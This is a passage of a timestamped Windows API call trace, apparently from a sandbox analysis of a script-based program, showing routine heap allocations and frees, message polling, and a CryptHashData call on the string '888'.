out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0244.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0244.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0244.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0244.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d58 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.551] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0244.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d58 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0244.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0244.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ef8 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e18 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0244.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.554] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0244.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0244.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50fe0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0244.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.558] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0244.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0244.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.558] CryptHashData (hHash=0xa86f90, pbData=0x2e54d58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0244.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0244.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0244.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.559] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 